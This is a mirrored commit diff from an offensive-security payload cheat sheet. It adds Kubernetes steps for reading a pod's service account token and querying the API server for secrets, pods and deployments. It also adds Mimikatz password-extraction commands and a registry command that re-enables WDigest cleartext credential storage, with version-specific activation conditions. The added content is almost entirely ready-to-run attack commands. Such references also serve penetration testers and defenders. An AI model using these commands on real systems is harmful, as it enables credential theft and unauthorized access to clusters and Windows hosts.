mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Kubernetes - Privileged Service Account Token
This commit is contained in:
parent
cf5a4b6e97
commit
1535c5f1b3
@ -12,6 +12,8 @@
|
|||||||
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
|
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
|
||||||
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
|
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
|
||||||
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
|
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
|
||||||
|
- [Privileged Service Account Token](#privileged-service-account-token)
|
||||||
|
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
|
||||||
- [API addresses that you should know](#api-adresses-that-you-should-know)
|
- [API addresses that you should know](#api-adresses-that-you-should-know)
|
||||||
- [References](#references)
|
- [References](#references)
|
||||||
|
|
||||||
@ -111,6 +113,29 @@ curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Conten
|
|||||||
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
|
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Privileged Service Account Token
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ cat /run/secrets/kubernetes.io/serviceaccount/token
|
||||||
|
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||||
|
```
|
||||||
|
|
||||||
|
## Interesting endpoints to reach
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# List Pods
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
|
||||||
|
|
||||||
|
# List secrets
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||||
|
|
||||||
|
# List deployments
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
|
||||||
|
|
||||||
|
# List daemonsets
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## API addresses that you should know
|
## API addresses that you should know
|
||||||
|
|
||||||
|
@ -21,6 +21,8 @@ mimikatz # sekurlsa::wdigest
|
|||||||
|
|
||||||
## Mimikatz - Extract passwords
|
## Mimikatz - Extract passwords
|
||||||
|
|
||||||
|
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
mimikatz_command -f sekurlsa::logonPasswords full
|
mimikatz_command -f sekurlsa::logonPasswords full
|
||||||
mimikatz_command -f sekurlsa::wdigest
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
@ -28,8 +30,21 @@ mimikatz_command -f sekurlsa::wdigest
|
|||||||
# to re-enable wdigest in Windows Server 2012+
|
# to re-enable wdigest in Windows Server 2012+
|
||||||
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
|
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
|
||||||
# create a DWORD 'UseLogonCredential' with the value 1.
|
# create a DWORD 'UseLogonCredential' with the value 1.
|
||||||
|
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
:warning: To take effect, conditions are required :
|
||||||
|
- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
|
||||||
|
* Adding requires lock
|
||||||
|
* Removing requires signout
|
||||||
|
- Win10:
|
||||||
|
* Adding requires signout
|
||||||
|
* Removing requires signout
|
||||||
|
- Win2016:
|
||||||
|
* Adding requires lock
|
||||||
|
* Removing requires reboot
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Mini Dump
|
## Mimikatz - Mini Dump
|
||||||
|
|
||||||
Dump the lsass process.
|
Dump the lsass process.
|
||||||
|
@ -13,6 +13,7 @@
|
|||||||
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
|
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
|
||||||
- [Remote Code Execution with Java](#remote-code-execution-with-java)
|
- [Remote Code Execution with Java](#remote-code-execution-with-java)
|
||||||
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
|
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user